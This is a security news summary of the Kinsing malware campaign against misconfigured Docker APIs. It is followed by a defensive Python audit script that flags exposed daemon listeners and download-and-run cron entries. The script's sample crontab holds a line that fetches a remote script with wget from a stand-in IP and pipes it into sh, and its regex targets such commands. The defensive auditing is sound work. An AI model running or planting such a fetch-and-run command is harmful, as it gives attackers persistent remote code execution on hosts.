Self-Propagating Malware Targets Thousands of Docker Ports Per Day (Security News, April 2020)
The Docker cloud containerization technology is under fire, with an organized, self-propagating cryptomining campaign targeting misconfigured open Docker Daemon API ports.
The attack pattern starts with the attackers identifying a misconfigured Docker API port that has been left open to the public internet.
According to the analysis, the shell script does several things: it disables security measures and clears logs; kills any other malware or cryptominers and deletes any files related to them; kills any running rival malicious Docker containers and deletes their images; downloads the Kinsing malware and runs it; and uses crontab to download and run the same original script once every minute, presumably to maintain persistence.
"Using the information gathered, the malware then attempts to connect to each host, using every possible user and key combination through SSH, in order to download the aforementioned [d.sh] shell script and run the malware on other hosts or containers in the network."
DevSecOps teams can take steps to protect against the Kinsing threat and others, starting with making sure their Docker containers are locked down.
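As a starting point for that lockdown, the following added example (not code from the article or the analysis it cites) audits a host for the two conditions described above: a Docker daemon API listener reachable over non-loopback TCP without client-certificate verification, and a crontab entry that downloads and runs a script every minute. It assumes the daemon is configured through a `daemon.json` file rather than `-H` command-line flags; the function names, sample inputs, IP address and file names are constructed for illustration.

```python
import json
import re
from urllib.parse import urlsplit

LOOPBACK = {"127.0.0.1", "localhost", "::1"}
# Every-minute schedule whose command fetches something and pipes it to a shell.
CRON_FETCH_RUN = re.compile(
    r"^\s*\*\s+\*\s+\*\s+\*\s+\*\s+.*\b(curl|wget)\b.*\|\s*(ba)?sh\b")

def exposed_docker_hosts(daemon_json: str) -> list[str]:
    """Return 'hosts' entries listening on non-loopback TCP without tlsverify."""
    cfg = json.loads(daemon_json)
    if cfg.get("tlsverify") is True:
        return []  # TCP listeners require a client certificate
    findings = []
    for host in cfg.get("hosts", []):
        url = urlsplit(host)
        # A missing hostname (tcp://:2375) binds all interfaces, so flag it too.
        if url.scheme == "tcp" and url.hostname not in LOOPBACK:
            findings.append(host)
    return findings

def suspicious_cron_lines(crontab: str) -> list[str]:
    """Return crontab lines that download and run a script once every minute."""
    return [ln for ln in crontab.splitlines()
            if not ln.lstrip().startswith("#") and CRON_FETCH_RUN.search(ln)]

# Constructed sample inputs (not taken from the campaign).
SAMPLE_DAEMON_JSON = (
    '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}')
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * wget -q -O - http://198.51.100.7/example.sh | sh > /dev/null 2>&1
"""

if __name__ == "__main__":
    for h in exposed_docker_hosts(SAMPLE_DAEMON_JSON):
        print("exposed Docker API listener:", h)
    for ln in suspicious_cron_lines(SAMPLE_CRONTAB):
        print("cron download-and-run entry:", ln)
```

On a real host, feed the functions the contents of `/etc/docker/daemon.json` and the output of `crontab -l` for each user.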
News URL
https://threatpost.com/self-propagating-malware-docker-ports/154453/